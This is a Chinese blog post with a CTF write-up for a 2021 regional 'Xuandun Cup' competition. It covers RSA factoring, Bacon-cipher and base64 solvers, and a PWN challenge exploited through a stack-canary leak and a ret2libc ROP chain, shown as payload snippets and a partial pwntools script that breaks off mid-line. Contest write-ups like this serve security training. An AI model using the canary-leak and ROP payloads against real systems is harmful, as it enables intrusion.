<!DOCTYPE html>
<html lang="zh">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.0.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">
  <meta name="google-site-verification" content="8AOkjVl4_iukPinKmdlm-v7nhMS1Bbq4njJrJzT7DNg">
  <meta name="baidu-site-verification" content="codeva-8CKVzgdicx">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"blog.paulownia.top","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"always","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":"valine","storage":true,"lazyload":false,"nav":{"valine":{"order":-1}},"activeClass":"valine"},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="2021年西藏自治区第三届“玄盾杯”网络安全技能竞赛团队CTF题目Writeup">
<meta property="og:type" content="article">
<meta property="og:title" content="2021年自治区第三届&quot;玄盾杯&quot;团队CTF">
<meta property="og:url" content="https://blog.paulownia.top/2021/09/21/2021%E5%B9%B4%E8%87%AA%E6%B2%BB%E5%8C%BA%E7%AC%AC%E4%B8%89%E5%B1%8A%E7%8E%84%E7%9B%BE%E6%9D%AF%E5%9B%A2%E9%98%9FCTF/index.html">
<meta property="og:site_name" content="Paulownia&#39;s Blog">
<meta property="og:description" content="2021年西藏自治区第三届“玄盾杯”网络安全技能竞赛团队CTF题目Writeup">
<meta property="og:locale">
<meta property="og:image" content="https://blog.paulownia.top/2021/09/21/2021%E5%B9%B4%E8%87%AA%E6%B2%BB%E5%8C%BA%E7%AC%AC%E4%B8%89%E5%B1%8A%E7%8E%84%E7%9B%BE%E6%9D%AF%E5%9B%A2%E9%98%9FCTF/202202151609677.png">
<meta property="og:image" content="https://blog.paulownia.top/2021/09/21/2021%E5%B9%B4%E8%87%AA%E6%B2%BB%E5%8C%BA%E7%AC%AC%E4%B8%89%E5%B1%8A%E7%8E%84%E7%9B%BE%E6%9D%AF%E5%9B%A2%E9%98%9FCTF/202202151609679.png">
<meta property="og:image" content="https://blog.paulownia.top/2021/09/21/2021%E5%B9%B4%E8%87%AA%E6%B2%BB%E5%8C%BA%E7%AC%AC%E4%B8%89%E5%B1%8A%E7%8E%84%E7%9B%BE%E6%9D%AF%E5%9B%A2%E9%98%9FCTF/202202151609680.png">
<meta property="og:image" content="https://blog.paulownia.top/2021/09/21/2021%E5%B9%B4%E8%87%AA%E6%B2%BB%E5%8C%BA%E7%AC%AC%E4%B8%89%E5%B1%8A%E7%8E%84%E7%9B%BE%E6%9D%AF%E5%9B%A2%E9%98%9FCTF/202202151609681.png">
<meta property="og:image" content="https://blog.paulownia.top/2021/09/21/2021%E5%B9%B4%E8%87%AA%E6%B2%BB%E5%8C%BA%E7%AC%AC%E4%B8%89%E5%B1%8A%E7%8E%84%E7%9B%BE%E6%9D%AF%E5%9B%A2%E9%98%9FCTF/202202151609682.png">
<meta property="og:image" content="https://blog.paulownia.top/2021/09/21/2021%E5%B9%B4%E8%87%AA%E6%B2%BB%E5%8C%BA%E7%AC%AC%E4%B8%89%E5%B1%8A%E7%8E%84%E7%9B%BE%E6%9D%AF%E5%9B%A2%E9%98%9FCTF/202202151609683.png">
<meta property="og:image" content="https://blog.paulownia.top/2021/09/21/2021%E5%B9%B4%E8%87%AA%E6%B2%BB%E5%8C%BA%E7%AC%AC%E4%B8%89%E5%B1%8A%E7%8E%84%E7%9B%BE%E6%9D%AF%E5%9B%A2%E9%98%9FCTF/202202151609684.png">
<meta property="og:image" content="https://blog.paulownia.top/2021/09/21/2021%E5%B9%B4%E8%87%AA%E6%B2%BB%E5%8C%BA%E7%AC%AC%E4%B8%89%E5%B1%8A%E7%8E%84%E7%9B%BE%E6%9D%AF%E5%9B%A2%E9%98%9FCTF/202202151609685.png">
<meta property="og:image" content="https://blog.paulownia.top/2021/09/21/2021%E5%B9%B4%E8%87%AA%E6%B2%BB%E5%8C%BA%E7%AC%AC%E4%B8%89%E5%B1%8A%E7%8E%84%E7%9B%BE%E6%9D%AF%E5%9B%A2%E9%98%9FCTF/202202151609686.png">
<meta property="og:image" content="https://blog.paulownia.top/2021/09/21/2021%E5%B9%B4%E8%87%AA%E6%B2%BB%E5%8C%BA%E7%AC%AC%E4%B8%89%E5%B1%8A%E7%8E%84%E7%9B%BE%E6%9D%AF%E5%9B%A2%E9%98%9FCTF/202202151609687.png">
<meta property="og:image" content="https://blog.paulownia.top/2021/09/21/2021%E5%B9%B4%E8%87%AA%E6%B2%BB%E5%8C%BA%E7%AC%AC%E4%B8%89%E5%B1%8A%E7%8E%84%E7%9B%BE%E6%9D%AF%E5%9B%A2%E9%98%9FCTF/202202151609688.png">
<meta property="og:image" content="https://blog.paulownia.top/2021/09/21/2021%E5%B9%B4%E8%87%AA%E6%B2%BB%E5%8C%BA%E7%AC%AC%E4%B8%89%E5%B1%8A%E7%8E%84%E7%9B%BE%E6%9D%AF%E5%9B%A2%E9%98%9FCTF/202202151609689.png">
<meta property="og:image" content="https://blog.paulownia.top/2021/09/21/2021%E5%B9%B4%E8%87%AA%E6%B2%BB%E5%8C%BA%E7%AC%AC%E4%B8%89%E5%B1%8A%E7%8E%84%E7%9B%BE%E6%9D%AF%E5%9B%A2%E9%98%9FCTF/202202151609690.png">
<meta property="og:image" content="https://blog.paulownia.top/2021/09/21/2021%E5%B9%B4%E8%87%AA%E6%B2%BB%E5%8C%BA%E7%AC%AC%E4%B8%89%E5%B1%8A%E7%8E%84%E7%9B%BE%E6%9D%AF%E5%9B%A2%E9%98%9FCTF/202202151609691.png">
<meta property="og:image" content="https://blog.paulownia.top/2021/09/21/2021%E5%B9%B4%E8%87%AA%E6%B2%BB%E5%8C%BA%E7%AC%AC%E4%B8%89%E5%B1%8A%E7%8E%84%E7%9B%BE%E6%9D%AF%E5%9B%A2%E9%98%9FCTF/202202151609692.png">
<meta property="og:image" content="https://blog.paulownia.top/2021/09/21/2021%E5%B9%B4%E8%87%AA%E6%B2%BB%E5%8C%BA%E7%AC%AC%E4%B8%89%E5%B1%8A%E7%8E%84%E7%9B%BE%E6%9D%AF%E5%9B%A2%E9%98%9FCTF/202202151609693.png">
<meta property="og:image" content="https://blog.paulownia.top/2021/09/21/2021%E5%B9%B4%E8%87%AA%E6%B2%BB%E5%8C%BA%E7%AC%AC%E4%B8%89%E5%B1%8A%E7%8E%84%E7%9B%BE%E6%9D%AF%E5%9B%A2%E9%98%9FCTF/202202151609694.png">
<meta property="og:image" content="https://blog.paulownia.top/2021/09/21/2021%E5%B9%B4%E8%87%AA%E6%B2%BB%E5%8C%BA%E7%AC%AC%E4%B8%89%E5%B1%8A%E7%8E%84%E7%9B%BE%E6%9D%AF%E5%9B%A2%E9%98%9FCTF/202202151609695.png">
<meta property="og:image" content="https://blog.paulownia.top/2021/09/21/2021%E5%B9%B4%E8%87%AA%E6%B2%BB%E5%8C%BA%E7%AC%AC%E4%B8%89%E5%B1%8A%E7%8E%84%E7%9B%BE%E6%9D%AF%E5%9B%A2%E9%98%9FCTF/202202151609696.png">
<meta property="og:image" content="https://blog.paulownia.top/2021/09/21/2021%E5%B9%B4%E8%87%AA%E6%B2%BB%E5%8C%BA%E7%AC%AC%E4%B8%89%E5%B1%8A%E7%8E%84%E7%9B%BE%E6%9D%AF%E5%9B%A2%E9%98%9FCTF/202202151609697.png">
<meta property="og:image" content="https://blog.paulownia.top/2021/09/21/2021%E5%B9%B4%E8%87%AA%E6%B2%BB%E5%8C%BA%E7%AC%AC%E4%B8%89%E5%B1%8A%E7%8E%84%E7%9B%BE%E6%9D%AF%E5%9B%A2%E9%98%9FCTF/202202151609698.png">
<meta property="og:image" content="https://blog.paulownia.top/2021/09/21/2021%E5%B9%B4%E8%87%AA%E6%B2%BB%E5%8C%BA%E7%AC%AC%E4%B8%89%E5%B1%8A%E7%8E%84%E7%9B%BE%E6%9D%AF%E5%9B%A2%E9%98%9FCTF/202202151609699.png">
<meta property="og:image" content="https://blog.paulownia.top/2021/09/21/2021%E5%B9%B4%E8%87%AA%E6%B2%BB%E5%8C%BA%E7%AC%AC%E4%B8%89%E5%B1%8A%E7%8E%84%E7%9B%BE%E6%9D%AF%E5%9B%A2%E9%98%9FCTF/202202151609700.png">
<meta property="og:image" content="https://blog.paulownia.top/2021/09/21/2021%E5%B9%B4%E8%87%AA%E6%B2%BB%E5%8C%BA%E7%AC%AC%E4%B8%89%E5%B1%8A%E7%8E%84%E7%9B%BE%E6%9D%AF%E5%9B%A2%E9%98%9FCTF/202202151609701.png">
<meta property="og:image" content="https://blog.paulownia.top/2021/09/21/2021%E5%B9%B4%E8%87%AA%E6%B2%BB%E5%8C%BA%E7%AC%AC%E4%B8%89%E5%B1%8A%E7%8E%84%E7%9B%BE%E6%9D%AF%E5%9B%A2%E9%98%9FCTF/202202151609702.png">
<meta property="og:image" content="https://blog.paulownia.top/2021/09/21/2021%E5%B9%B4%E8%87%AA%E6%B2%BB%E5%8C%BA%E7%AC%AC%E4%B8%89%E5%B1%8A%E7%8E%84%E7%9B%BE%E6%9D%AF%E5%9B%A2%E9%98%9FCTF/202202151609703.png">
<meta property="og:image" content="https://blog.paulownia.top/2021/09/21/2021%E5%B9%B4%E8%87%AA%E6%B2%BB%E5%8C%BA%E7%AC%AC%E4%B8%89%E5%B1%8A%E7%8E%84%E7%9B%BE%E6%9D%AF%E5%9B%A2%E9%98%9FCTF/202202151609704.png">
<meta property="og:image" content="https://blog.paulownia.top/2021/09/21/2021%E5%B9%B4%E8%87%AA%E6%B2%BB%E5%8C%BA%E7%AC%AC%E4%B8%89%E5%B1%8A%E7%8E%84%E7%9B%BE%E6%9D%AF%E5%9B%A2%E9%98%9FCTF/202202151609705.png">
<meta property="og:image" content="https://blog.paulownia.top/2021/09/21/2021%E5%B9%B4%E8%87%AA%E6%B2%BB%E5%8C%BA%E7%AC%AC%E4%B8%89%E5%B1%8A%E7%8E%84%E7%9B%BE%E6%9D%AF%E5%9B%A2%E9%98%9FCTF/202202151609706.png">
<meta property="article:published_time" content="2021-09-21T09:46:11.000Z">
<meta property="article:modified_time" content="2024-09-12T15:59:19.454Z">
<meta property="article:author" content="Paulownia">
<meta property="article:tag" content="WriteUp">
<meta property="article:tag" content="自治区">
<meta property="article:tag" content="玄盾杯">
<meta property="article:tag" content="CTF">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://blog.paulownia.top/2021/09/21/2021%E5%B9%B4%E8%87%AA%E6%B2%BB%E5%8C%BA%E7%AC%AC%E4%B8%89%E5%B1%8A%E7%8E%84%E7%9B%BE%E6%9D%AF%E5%9B%A2%E9%98%9FCTF/202202151609677.png">

<link rel="canonical" href="https://blog.paulownia.top/2021/09/21/2021%E5%B9%B4%E8%87%AA%E6%B2%BB%E5%8C%BA%E7%AC%AC%E4%B8%89%E5%B1%8A%E7%8E%84%E7%9B%BE%E6%9D%AF%E5%9B%A2%E9%98%9FCTF/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh'
  };
</script>

  <title>2021年自治区第三届"玄盾杯"团队CTF | Paulownia's Blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Paulownia's Blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">Paulownia的自留地</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>About</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>Tags</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>Categories</a>

  </li>
        <li class="menu-item menu-item-sitemap">

    <a href="/sitemap.xml" rel="section"><i class="fa fa-sitemap fa-fw"></i>Sitemap</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh">
    <link itemprop="mainEntityOfPage" href="https://blog.paulownia.top/2021/09/21/2021%E5%B9%B4%E8%87%AA%E6%B2%BB%E5%8C%BA%E7%AC%AC%E4%B8%89%E5%B1%8A%E7%8E%84%E7%9B%BE%E6%9D%AF%E5%9B%A2%E9%98%9FCTF/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="Paulownia">
      <meta itemprop="description" content="一只不专业的细狗">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Paulownia's Blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          2021年自治区第三届"玄盾杯"团队CTF
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              <time title="Created: 2021-09-21 17:46:11" itemprop="dateCreated datePublished" datetime="2021-09-21T17:46:11+08:00">2021-09-21</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">Edited on</span>
                <time title="Modified: 2024-09-12 23:59:19" itemprop="dateModified" datetime="2024-09-12T23:59:19+08:00">2024-09-12</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">In</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/CTF-s-WriteUp/" itemprop="url" rel="index"><span itemprop="name">CTF's WriteUp</span></a>
                </span>
            </span>

          
            <span id="/2021/09/21/2021%E5%B9%B4%E8%87%AA%E6%B2%BB%E5%8C%BA%E7%AC%AC%E4%B8%89%E5%B1%8A%E7%8E%84%E7%9B%BE%E6%9D%AF%E5%9B%A2%E9%98%9FCTF/" class="post-meta-item leancloud_visitors" data-flag-title="2021年自治区第三届"玄盾杯"团队CTF" title="Views">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">Views: </span>
              <span class="leancloud-visitors-count"></span>
            </span>
  
  <span class="post-meta-item">
    
      <span class="post-meta-item-icon">
        <i class="far fa-comment"></i>
      </span>
      <span class="post-meta-item-text">Valine: </span>
    
    <a title="valine" href="/2021/09/21/2021%E5%B9%B4%E8%87%AA%E6%B2%BB%E5%8C%BA%E7%AC%AC%E4%B8%89%E5%B1%8A%E7%8E%84%E7%9B%BE%E6%9D%AF%E5%9B%A2%E9%98%9FCTF/#valine-comments" itemprop="discussionUrl">
      <span class="post-comments-count valine-comment-count" data-xid="/2021/09/21/2021%E5%B9%B4%E8%87%AA%E6%B2%BB%E5%8C%BA%E7%AC%AC%E4%B8%89%E5%B1%8A%E7%8E%84%E7%9B%BE%E6%9D%AF%E5%9B%A2%E9%98%9FCTF/" itemprop="commentCount"></span>
    </a>
  </span>
  
  
            <div class="post-description">2021年西藏自治区第三届“玄盾杯”网络安全技能竞赛团队CTF题目Writeup</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>21年参加的自治区的第一场比赛，整场比赛都是团队赛，团队CTF加两场AWD，在第一场CTF小输不多后，在第二场AWD迎头赶上，第三场AWD继续小输一些。就在我们欢喜的等待玄盾杯的第一个冠军要到手了之后，惊奇的发现裁判的最终成绩，我们屈居第二，并且在我们问成绩的时候，裁判笑着说继续努力。。。</p>
<p>然而在每场比赛结束后不截图积分榜的CTFer不是好厨子，我们每场比赛的结果都截了图，再即使被扣掉第二场多攻击了一轮的分之后，我们依然是第一名，在主办方和我们的注视下，裁判无奈的宣布我们是第一。。。</p>
<p>本场比赛的最宝贵经验就是，在比赛结束时一定要截图，另外要熟练掌握四位数以内的加减法。</p>
<h1 id="Crypto"><a href="#Crypto" class="headerlink" title="Crypto"></a>Crypto</h1><h2 id="RSA"><a href="#RSA" class="headerlink" title="RSA"></a>RSA</h2><blockquote>
<p>n&#x3D; 703739435902178622788120837062252491867056043804038443493374414926110815100242619<br>e&#x3D; 59159<br>c&#x3D; 449590107303744450592771521828486744432324538211104865947743276969382998354463377<br>m&#x3D;???</p>
</blockquote>
<p>比赛的时候，用yafu是分解除了三个因数，但是写wp的时候，yafu只能分出来2个。。。然后发现可以用sage进行分解，不过时间有点久，得四五分钟的样子</p>
<p><img src="202202151609677.png" alt="image-20210926101608134"></p>
<p>exp</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> gmpy2,libnum</span><br><span class="line">e= <span class="number">59159</span></span><br><span class="line">c= <span class="number">449590107303744450592771521828486744432324538211104865947743276969382998354463377</span></span><br><span class="line">p = <span class="number">782758164865345954251810941</span></span><br><span class="line">q= <span class="number">810971978554706690040814093</span></span><br><span class="line">r = <span class="number">1108609086364627583447802163</span></span><br><span class="line">n = p*q*r</span><br><span class="line">phin = (p-<span class="number">1</span>)*(q-<span class="number">1</span>)*(r-<span class="number">1</span>)</span><br><span class="line">d = gmpy2.invert(e,phin)</span><br><span class="line">m = <span class="built_in">pow</span>(c,d,n)</span><br><span class="line"><span class="built_in">print</span>(m)</span><br><span class="line">flag = libnum.n2s(m)</span><br><span class="line"><span class="built_in">print</span>(flag)</span><br></pre></td></tr></table></figure>

<p><img src="202202151609679.png" alt="image-20210926101722227"></p>
<h2 id="peigenya"><a href="#peigenya" class="headerlink" title="peigenya"></a>peigenya</h2><p>题目是一个word，打开移开图片之后，ctrl+a选中全部，找到隐藏的字符，发现了密文</p>
<p><img src="202202151609680.png" alt="image-20210926102051464"></p>
<p>比赛的时候以为这个就是答案，然而并不是，后来又以为是提示，找了半天也没找到密文，后来才知道，这个就是密文。</p>
<p>其中大写对应A，小写对应B</p>
<p>exp</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> string</span><br><span class="line">c = <span class="string">&quot;NI_HAo_WO_SHI_PEI_gEN_mi_Ma_Ya_n_HAo_Wo_sHI_Pe_G_Mi_MA_Ya&quot;</span></span><br><span class="line">bacon_c = <span class="string">&quot;&quot;</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> c:</span><br><span class="line">    <span class="keyword">if</span> i.isupper():</span><br><span class="line">        bacon_c += <span class="string">&quot;A&quot;</span></span><br><span class="line">    <span class="keyword">elif</span> i.islower():</span><br><span class="line">        bacon_c += <span class="string">&quot;B&quot;</span></span><br><span class="line"><span class="built_in">print</span>(bacon_c)</span><br></pre></td></tr></table></figure>

<p><img src="202202151609681.png" alt="image-20210926103232351"></p>
<h2 id="base"><a href="#base" class="headerlink" title="base"></a>base</h2><p>N次base64加密</p>
<p>exp</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">&quot;./c.txt&quot;</span>) <span class="keyword">as</span> f:</span><br><span class="line">    c = f.read()</span><br><span class="line">res = base64.b64decode(c)</span><br><span class="line"><span class="keyword">while</span> <span class="string">b&quot;flag&quot;</span> <span class="keyword">not</span> <span class="keyword">in</span> res:</span><br><span class="line">    res = base64.b64decode(res)</span><br><span class="line"><span class="built_in">print</span>(res)</span><br></pre></td></tr></table></figure>

<p><img src="202202151609682.png" alt="image-20210926103640318"></p>
<p>比赛的时候，没写判断，觉得只要多此解码后得到包含flag的字符串，就会报错推出，结果写wp的时候发现，flag字符串竟然可以在进行好几次的base64decode。。。。所以最终exp写了判断是否包含flag</p>
<h2 id="AES-待补充"><a href="#AES-待补充" class="headerlink" title="AES | 待补充"></a>AES | 待补充</h2><blockquote>
<p>U2FsdGVkX18YBMRq9g4RbzqClPRa59epJfOToDypjuRCmBZGILUxI+E65q03DdkPyTa48xSOQNSK5Ow0ZpOAf8yoFx5OCXZI&#x2F;VADW4tPYno&#x3D;</p>
</blockquote>
<p>AES加密</p>
<h1 id="Misc"><a href="#Misc" class="headerlink" title="Misc"></a>Misc</h1><h2 id="PNG"><a href="#PNG" class="headerlink" title="PNG"></a>PNG</h2><h1 id="Reverse"><a href="#Reverse" class="headerlink" title="Reverse"></a>Reverse</h1><h2 id="EasyRE"><a href="#EasyRE" class="headerlink" title="EasyRE"></a>EasyRE</h2><h2 id="APK"><a href="#APK" class="headerlink" title="APK"></a>APK</h2><h2 id="map"><a href="#map" class="headerlink" title="map"></a>map</h2><h1 id="PWN"><a href="#PWN" class="headerlink" title="PWN"></a>PWN</h1><h2 id="PWN1"><a href="#PWN1" class="headerlink" title="PWN1"></a>PWN1</h2><p><img src="202202151609683.png" alt="image-20211008170306045"></p>
<p>栈保护、NX保护，所以需要栈开启了随机地址保护，并且没有办法注入shellcode</p>
<p>思路：</p>
<p>通过泄露pu</p>
<p>可以写入shellcode，所以最终的思路就是通过ROP链，写入shellcode然后getshell</p>
<p>0x0 找到rdi的ret地址</p>
<p><img src="202202151609684.png" alt="image-20210927122723194"></p>
<p>可以看到，函数中调用了puts，并且show_data函数中，可以泄露出puts的真实地址，构造以下payload，其中overflow_offset通过ida_pro确定</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">overflow_offset+ p64(pop_rdi_ret) + p64(puts_got_addr) + p64(puts_plt_addr) + p64(vul_func_addr)</span><br></pre></td></tr></table></figure>

<p><img src="202202151609685.png" alt="image-20211009120111451"></p>
<p>但是，因为程序开启了canary保护，所以，如果不能够猜到canary的值的话，程序会进行栈溢出检测，并且退出</p>
<p><img src="202202151609686.png" alt="image-20211009120225731"></p>
<p>canary保护的具体原理</p>
<blockquote>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/ttxs69/p/pwn_canary.html">https://www.cnblogs.com/ttxs69/p/pwn_canary.html</a></p>
</blockquote>
<p><img src="202202151609687.png" alt="image-20211009120404147"></p>
<p>也就是说，所有的payload，都需要先将canary的值放进去，然后再进行rop构造。</p>
<p>可以看到下图，此程序执行时，栈底会有一个00结尾的随机数，这个就是canary的值，所以溢出时，需要将其加到payload中，现在就要考虑如何泄露出canary的值。</p>
<p><img src="202202151609688.png" alt="image-20211009120652981"></p>
<p>泄露canary的思路</p>
<p><img src="202202151609689.png" alt="image-20211009122705021"></p>
<p>本题目通过show_data函数的puts进行泄露，</p>
<p><img src="202202151609690.png" alt="image-20211011111413589"></p>
<p>payload</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload = <span class="string">b&#x27;a&#x27;</span>*(<span class="number">0x110</span>- <span class="number">0x10</span> + <span class="number">8</span>)<span class="comment">#在前面选择输入内容长度时，长度为payload+1，用于覆盖canary的低位\x00</span></span><br></pre></td></tr></table></figure>



<p>泄露出canary之后，需要泄露出puts的真实地址，根据前面找到的pop ret地址，构造payload</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload = overflow_offset + p64(canary_addr)+p64(<span class="number">0</span>)+p64(pop_rdi_ret) + p64(puts_got_addr) + p64(puts_plt_addr) + p64(vul_func_addr)</span><br></pre></td></tr></table></figure>

<p>这个地方的p64(0)用于覆盖rbp的值，否则pop_rdi的地址会偏移到rbp中，导致无法ret后面的exp</p>
<p><img src="202202151609691.png" alt="image-20211011115904900"></p>
<p>如果不覆盖rbp，pop_rdi_ret的值会在rbp中</p>
<p><img src="202202151609692.png" alt="image-20211011120042254"></p>
<p>然后，此题给的libc是有问题的似乎，通过对比泄露出的system地址和puts等地址，以及程序运行时实际函数的地址，发现并不一致。</p>
<p><img src="202202151609693.png" alt="image-20211011120410695"></p>
<p>通过运行给出的system函数的低位，在线找到libc库</p>
<p><img src="202202151609694.png" alt="image-20211011120510914"></p>
<p>或者使用本地LibcSearcher进行查找，手动安装的LibcSearcher，需要把libc-database放到libcsearch安装的目录下，否则找不到相应的libc库。</p>
<p>然后成功在本机getshell。</p>
<p>exp</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> pwnlib.adb.adb <span class="keyword">import</span> interactive</span><br><span class="line"><span class="keyword">from</span> pwnlib.gdb <span class="keyword">import</span> binary</span><br><span class="line">context (</span><br><span class="line">    log_level = <span class="string">&quot;debug&quot;</span>,</span><br><span class="line">    binary = <span class="string">&quot;./pwn&quot;</span>,</span><br><span class="line">    terminal = [<span class="string">&#x27;tmux&#x27;</span>,<span class="string">&#x27;splitw&#x27;</span>,<span class="string">&#x27;-h&#x27;</span>]</span><br><span class="line">)</span><br><span class="line">pop_rdi_ret = <span class="number">0x04009f3</span></span><br><span class="line">elf = context.binary</span><br><span class="line"><span class="comment">#puts_plt_address</span></span><br><span class="line">puts_plt_addr = elf.plt[<span 